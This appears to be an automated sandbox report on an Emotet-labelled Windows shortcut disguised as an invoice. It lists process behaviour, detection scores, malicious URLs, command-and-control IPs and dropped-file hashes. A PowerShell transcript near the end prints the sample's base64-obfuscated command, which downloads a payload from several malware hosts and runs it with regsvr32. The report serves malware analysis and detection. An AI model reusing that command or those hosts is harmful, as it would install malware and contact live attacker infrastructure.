                    Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 Remote System Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
                    [Behavior graph] ID: 632057; Sample: RechnungsDetails 2022.20.05...; Startdate: 23/05/2022; Architecture: WINDOWS; Score: 100
                    Top-level signatures: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 9 other signatures
                    cmd.exe (started): Windows shortcut file (LNK) starts blacklisted processes; Suspicious powershell command line found; started powershell.exe and conhost.exe
                    powershell.exe: contacted jsonsintl.com (98.142.105.106, 49754, 80, DIMENOCUS, United States) and www.jsonsintl.com; dropped C:\Users\user\AppData\...\IKdzfJtQpj.BCP (PE32+); Powershell drops PE file; started regsvr32.exe
                    regsvr32.exe: dropped C:\Windows\System32\ZrCipB\RLcE.dll (copy), PE32+; Hides that the sample has been downloaded from the Internet (zone.identifier); started a second regsvr32.exe
                    regsvr32.exe (second): connected to 173.82.82.196, 49782, 8080 (MULTA-ASN1US, United States); System process connects to network (likely due to code injection or exploit)
                    svchost.exe (two instances, plus 4 other processes): 127.0.0.1 and 192.168.2.1 (unknown)

                    Source | Detection | Scanner | Label | Link
                    RechnungsDetails 2022.20.05_1044.lnk | 41% | ReversingLabs | Shortcut.Trojan.BynocoLNK |
                    RechnungsDetails 2022.20.05_1044.lnk | 100% | Joe Sandbox ML | |

                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP | 31% | Metadefender | | Browse
                    C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP | 40% | ReversingLabs | Win64.Trojan.Emotet |

                    No Antivirus matches

                    Source | Detection | Scanner | Label | Link
                    jsonsintl.com | 5% | Virustotal | | Browse
                    www.jsonsintl.com | 4% | Virustotal | | Browse

                    Source | Detection | Scanner | Label | Link
                    https://www.disneyplus.com/legal/your-california-privacy-rights | 0% | URL Reputation | safe |
                    http://www.jsonsintl.com/ | 0% | Avira URL Cloud | safe |
                    http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
                    http://digitalkitchen.jp/images/PVn/ | 100% | Avira URL Cloud | malware |
                    https://go.micro | 0% | URL Reputation | safe |
                    https://173.82.82.196/hU | 100% | Avira URL Cloud | malware |
                    https://contoso.com/License | 0% | URL Reputation | safe |
                    https://contoso.com/Icon | 0% | URL Reputation | safe |
                    https://173.82.82.196/ | 100% | URL Reputation | malware |
                    http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/ | 100% | Avira URL Cloud | malware |
                    http://crl.ver) | 0% | Avira URL Cloud | safe |
                    https://173.82.82.196:8080/s64 | 100% | Avira URL Cloud | malware |
                    https://www.tiktok.com/legal/report/feedback | 0% | URL Reputation | safe |
                    http://piffl.com/piffl.com/a/ity. | 100% | Avira URL Cloud | malware |
                    http://www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/ | 100% | Avira URL Cloud | malware |
                    http://jsonsintl.com | 0% | Avira URL Cloud | safe |
                    https://173.82.82.196:8080/ | 100% | URL Reputation | malware |
                    https://www.disneyplus.com/legal/privacy-policy | 0% | URL Reputation | safe |
                    http://piffl.com/piffl.com/a/ | 100% | Avira URL Cloud | malware |
                    https://173.82.82.196:8080/tem | 100% | Avira URL Cloud | malware |
                    https://nakharinitwebhosting.com/HSDYKN1X5GLF/ | 100% | Avira URL Cloud | malware |
                    http://crl.microsof | 0% | URL Reputation | safe |
                    http://www.jsonsintl.com | 0% | Avira URL Cloud | safe |
                    https://contoso.com/ | 0% | URL Reputation | safe |
                    https://www.pango.co/privacy | 0% | URL Reputation | safe |
                    https://disneyplus.com/legal. | 0% | URL Reputation | safe |
                    https://www.tiktok.com/legal/report | 0% | URL Reputation | safe |
                    http://help.disneyplus.com. | 0% | URL Reputation | safe |
                    http://www.jsonsintl.comx | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
jsonsintl.com | 98.142.105.106 | true | true | | unknown
www.jsonsintl.com | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/ | true | Avira URL Cloud: malware | unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000012.00000003.694418224.0000027EE418B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.694341843.0000027EE419D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.480357906.000001AFF0F43000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.jsonsintl.com/powershell.exe, 00000002.00000002.478199293.000001AFE1AFA000.00000004.00000800.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.461419461.000001AFE10F0000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.461419461.000001AFE10F0000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://digitalkitchen.jp/images/PVn/powershell.exe, 00000002.00000002.478199293.000001AFE1AFA000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://go.micropowershell.exe, 00000002.00000002.479789071.000001AFE2077000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://173.82.82.196/hUregsvr32.exe, 00000004.00000002.704197704.00000000005A8000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://contoso.com/Licensepowershell.exe, 00000002.00000002.480357906.000001AFF0F43000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://contoso.com/Iconpowershell.exe, 00000002.00000002.480357906.000001AFF0F43000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://173.82.82.196/regsvr32.exe, 00000004.00000002.704320323.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.527854903.00000000005E2000.00000004.00000020.00020000.00000000.sdmptrue
                        • URL Reputation: malware
                        unknown
                        http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/powershell.exe, 00000002.00000002.478199293.000001AFE1AFA000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        http://crl.ver)svchost.exe, 00000008.00000002.705634102.000001F197E85000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.704616242.0000027EE36EE000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        https://173.82.82.196:8080/s64regsvr32.exe, 00000004.00000002.704320323.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.527854903.00000000005E2000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000012.00000003.699274936.0000027EE41B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.699365782.0000027EE419C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.699248886.0000027EE41B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.699317061.0000027EE418B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.699433667.0000027EE4602000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://piffl.com/piffl.com/a/ity.powershell.exe, 00000002.00000002.461419461.000001AFE10F0000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        http://jsonsintl.compowershell.exe, 00000002.00000002.478180056.000001AFE1AED000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.461419461.000001AFE10F0000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://support.hotspotshield.com/svchost.exe, 00000012.00000003.683864450.0000027EE419D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684039321.0000027EE418B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684077801.0000027EE4619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.683974723.0000027EE4602000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684059886.0000027EE41AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684009134.0000027EE4603000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.683872663.0000027EE41AD000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://173.82.82.196:8080/regsvr32.exe, 00000004.00000002.704320323.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.527854903.00000000005E2000.00000004.00000020.00020000.00000000.sdmptrue
                            • URL Reputation: malware
                            unknown
                            https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000012.00000003.694418224.0000027EE418B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.694341843.0000027EE419D000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://piffl.com/piffl.com/a/powershell.exe, 00000002.00000002.478199293.000001AFE1AFA000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://173.82.82.196:8080/temregsvr32.exe, 00000004.00000002.704320323.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.527854903.00000000005E2000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://nakharinitwebhosting.com/HSDYKN1X5GLF/powershell.exe, 00000002.00000002.478199293.000001AFE1AFA000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://crl.microsofpowershell.exe, 00000002.00000002.481052167.000001AFF90D3000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.jsonsintl.compowershell.exe, 00000002.00000002.478143569.000001AFE1AD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.478180056.000001AFE1AED000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            https://contoso.com/powershell.exe, 00000002.00000002.480357906.000001AFF0F43000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.480357906.000001AFF0F43000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://www.hotspotshield.com/terms/svchost.exe, 00000012.00000003.683864450.0000027EE419D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684039321.0000027EE418B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684077801.0000027EE4619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.683974723.0000027EE4602000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684059886.0000027EE41AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684009134.0000027EE4603000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.683872663.0000027EE41AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://www.pango.co/privacysvchost.exe, 00000012.00000003.683864450.0000027EE419D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684039321.0000027EE418B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684077801.0000027EE4619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.683974723.0000027EE4602000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684059886.0000027EE41AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.684009134.0000027EE4603000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.683872663.0000027EE41AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://disneyplus.com/legal.svchost.exe, 00000012.00000003.694418224.0000027EE418B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.694341843.0000027EE419D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://www.tiktok.com/legal/reportsvchost.exe, 00000012.00000003.699317061.0000027EE418B000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.461186935.000001AFE0EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://cmentarz.5v.pl/themes/zalMkTb/powershell.exe, 00000002.00000002.478199293.000001AFE1AFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://help.disneyplus.com.svchost.exe, 00000012.00000003.694418224.0000027EE418B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.694341843.0000027EE419D000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.jsonsintl.comxpowershell.exe, 00000002.00000002.478143569.000001AFE1AD8000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
IP | Domain | Country | ASN | ASN Name | Malicious
173.82.82.196 | unknown | United States | 35916 | MULTA-ASN1US | true
98.142.105.106 | jsonsintl.com | United States | 33182 | DIMENOCUS | true
                                    IP
                                    192.168.2.1
                                    127.0.0.1
                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                    Analysis ID:632057
                                    Start date and time:2022-05-23 08:52:49 +02:00
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 7m 52s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:RechnungsDetails 2022.20.05_1044.lnk
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of new started processes analysed:20
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winLNK@14/8@2/4
                                    EGA Information:
                                    • Successful, ratio: 66.7%
                                    HDC Information:
                                    • Successful, ratio: 51.3% (good quality ratio 27.5%)
                                    • Quality average: 32.8%
                                    • Quality standard deviation: 37.5%
                                    HCA Information:
                                    • Successful, ratio: 95%
                                    • Number of executed functions: 41
                                    • Number of non-executed functions: 116
                                    Cookbook Comments:
                                    • Found application associated with file extension: .lnk
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, wuapihost.exe
                                    • Excluded IPs from analysis (whitelisted): 23.211.4.86, 20.223.24.244
                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                    • Execution Graph export aborted for target powershell.exe, PID 7100 because it is empty
                                    • Not all processes were analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
08:54:09 | API Interceptor | 39x Sleep call for process: powershell.exe modified
08:54:30 | API Interceptor | 9x Sleep call for process: svchost.exe modified
Match | Associated Sample Name / URL | Detection | Context
173.82.82.196 | Rechnung 2022.20.05_1440.xls | malicious |
173.82.82.196 | melimar.com.xls | malicious |
173.82.82.196 | AGK-010522 MJEY-210522.xls | malicious |
173.82.82.196 | qJhkILqiEA.dll | malicious |
173.82.82.196 | ySv9jlPYxN.dll | malicious |
173.82.82.196 | uDAHAlLDYG.dll | malicious |
173.82.82.196 | qJhkILqiEA.dll | malicious |
173.82.82.196 | kUXfb4ZQK4.dll | malicious |
173.82.82.196 | ySv9jlPYxN.dll | malicious |
173.82.82.196 | uDAHAlLDYG.dll | malicious |
173.82.82.196 | KzqzJLGI6e.dll | malicious |
173.82.82.196 | EVS7gcLnud.dll | malicious |
173.82.82.196 | kUXfb4ZQK4.dll | malicious |
173.82.82.196 | o2PJRbV77k.dll | malicious |
173.82.82.196 | EVS7gcLnud.dll | malicious |
173.82.82.196 | KzqzJLGI6e.dll | malicious |
173.82.82.196 | o2PJRbV77k.dll | malicious |
173.82.82.196 | M7GdKu4Giv.dll | malicious |
173.82.82.196 | Hr5V6ZHTKv.dll | malicious |
98.142.105.106 | Gmail.zip | malicious | www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/
Match | Associated Sample Name / URL | Detection | Context
MULTA-ASN1US | Rechnung 2022.20.05_1440.xls | malicious | 173.82.82.196
MULTA-ASN1US | melimar.com.xls | malicious | 173.82.82.196
MULTA-ASN1US | AGK-010522 MJEY-210522.xls | malicious | 173.82.82.196
MULTA-ASN1US | qJhkILqiEA.dll | malicious | 173.82.82.196
MULTA-ASN1US | ySv9jlPYxN.dll | malicious | 173.82.82.196
MULTA-ASN1US | uDAHAlLDYG.dll | malicious | 173.82.82.196
MULTA-ASN1US | qJhkILqiEA.dll | malicious | 173.82.82.196
MULTA-ASN1US | kUXfb4ZQK4.dll | malicious | 173.82.82.196
MULTA-ASN1US | ySv9jlPYxN.dll | malicious | 173.82.82.196
MULTA-ASN1US | uDAHAlLDYG.dll | malicious | 173.82.82.196
MULTA-ASN1US | KzqzJLGI6e.dll | malicious | 173.82.82.196
MULTA-ASN1US | EVS7gcLnud.dll | malicious | 173.82.82.196
MULTA-ASN1US | kUXfb4ZQK4.dll | malicious | 173.82.82.196
MULTA-ASN1US | o2PJRbV77k.dll | malicious | 173.82.82.196
MULTA-ASN1US | EVS7gcLnud.dll | malicious | 173.82.82.196
MULTA-ASN1US | KzqzJLGI6e.dll | malicious | 173.82.82.196
MULTA-ASN1US | o2PJRbV77k.dll | malicious | 173.82.82.196
MULTA-ASN1US | miori.arm7-20220522-1600 | malicious | 216.127.183.179
MULTA-ASN1US | M7GdKu4Giv.dll | malicious | 173.82.82.196
DIMENOCUS | Gmail.zip | malicious | 98.142.105.106
DIMENOCUS | miori.arm | malicious | 184.171.252.89
DIMENOCUS | invoice.xlsx | malicious | 186.227.194.58
DIMENOCUS | myp0912.exe | malicious | 198.136.49.34
DIMENOCUS | http://walbrookasset.andreidesign.com.br/ere/?e=bmVpbC5zYXdicmlkZ2VAd2FsYnJvb2thc3NldC5jb20= | malicious | 67.23.238.11
DIMENOCUS | http://walbrookasset.andreidesign.com.br/ere/?e=bmVpbC5zYXdicmlkZ2VAd2FsYnJvb2thc3NldC5jb20= | malicious | 67.23.238.11
DIMENOCUS | http://seccl.grupotech.com.br/ioo/?e=amFjay5jdWxsaXNAc2VjY2wudGVjaA== | malicious | 187.45.179.58
DIMENOCUS | YIbpw8Kksn | malicious | 198.136.58.131
DIMENOCUS | swift copy.exe | malicious | 64.37.52.225
DIMENOCUS | documents.exe | malicious | 64.37.52.225
DIMENOCUS | Invoice.exe | malicious | 64.37.52.225
DIMENOCUS | Invoice.exe | malicious | 64.37.52.225
DIMENOCUS | Payment Slip.exe | malicious | 64.37.52.225
DIMENOCUS | Payment Slip.exe | malicious | 64.37.52.225
DIMENOCUS | 0Pey7zVmAB | malicious | 98.142.106.247
DIMENOCUS | 7995387849855083251770484.lnk | malicious | 138.128.170.10
DIMENOCUS | mybe.xlsm | malicious | 212.18.231.208
DIMENOCUS | mybe.xlsm | malicious | 212.18.231.208
DIMENOCUS | X_3333044513.xlsb | malicious | 212.18.231.208
                                                                          No context
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                          Process:C:\Windows\System32\svchost.exe
                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xcd192033, page size 16384, DirtyShutdown, Windows version 10.0
                                                                          Category:dropped
                                                                          Size (bytes):786432
                                                                          Entropy (8bit):0.2506588403849658
                                                                          Encrypted:false
                                                                          SSDEEP:384:M+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:TSB2nSB2RSjlK/+mLesOj1J2
                                                                          MD5:2B8BE8B3C3CED65563CC4CB9EADCC3EC
                                                                          SHA1:6DE73BCAD562E238AF9948F4F744AB373AC8A3F2
                                                                          SHA-256:05126F1424E718FB2A521C971F470D202909639AFB23A209135BDD5F34385248
                                                                          SHA-512:AF6E261FDDB577365675E4A682D6817A184C9258E5DD1BDD026D7C451A485DA8C49A0F3F3B5B2B485F9A010507A6D2AEA16D2B957053F8D50BDA845E54756813
                                                                          Malicious:false
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):1192
                                                                          Entropy (8bit):5.325275554903011
                                                                          Encrypted:false
                                                                          SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5
                                                                          MD5:05CF074042A017A42C1877FC5DB819AB
                                                                          SHA1:5AF2016605B06ECE0BFB3916A9480D6042355188
                                                                          SHA-256:971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650
                                                                          SHA-512:96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A
                                                                          Malicious:false
                                                                          Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:very short file (no magic)
                                                                          Category:dropped
                                                                          Size (bytes):1
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:U:U
                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                          Malicious:false
                                                                          Preview:1
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:very short file (no magic)
                                                                          Category:dropped
                                                                          Size (bytes):1
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:U:U
                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                          Malicious:false
                                                                          Preview:1
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):365056
                                                                          Entropy (8bit):7.158107270371674
                                                                          Encrypted:false
                                                                          SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTN0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TsRIvgMSS3AyUrhYu3j
                                                                          MD5:12B85FB674E94931DA5BEBDAC764DA9A
                                                                          SHA1:9B3925EF9D538E889DAD5F7093CA3C578F9730C9
                                                                          SHA-256:4F7092CD881FC00ED017787C704C3D1B221B5B13D9A34539732BFC1EDB8261C5
                                                                          SHA-512:5167C98936578940E8A15308776DC10A2C3846C9262D7C189465F7DB1BA49E76DD4B227C8E2AD3ABA37139EE3E65A179B51397BD18362C9DF83D2160523C7EA1
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: Metadefender, Detection: 31%
                                                                          • Antivirus: ReversingLabs, Detection: 40%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2558
                                                                            Entropy (8bit):5.979633073915895
                                                                            Encrypted:false
                                                                            SSDEEP:48:BZuv/ooO+VipJ7o/awfYnB33ZoqDYB1ZkzVipJ7o/awfYnB33XoZZZC:BZC/oN+kpOtYnBHOqDo1ZEkpOtYnBHYM
                                                                            MD5:70BE1F4382251E34AE9AEE7F24557F6C
                                                                            SHA1:EAE883975F7B11C5E93216E2585B3F288F34E3AA
                                                                            SHA-256:2EF71BD4C4054FF7026969F2D3B4E21893A9CB4CE72653B22DBD66C42A1C3D68
                                                                            SHA-512:4BDE6D3AEC134832FEB7D56E0A4F252F1C57772AC896252882B634665B9A915EFB9FB5561579E01E7B5E3554A99AF25E02362E7C3FAF53520B19B3190B1EC0ED
                                                                            Malicious:false
                                                                            Preview:.**********************..Windows PowerShell transcript start..Start time: 20220523085409..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 580913 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe -c &{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):55
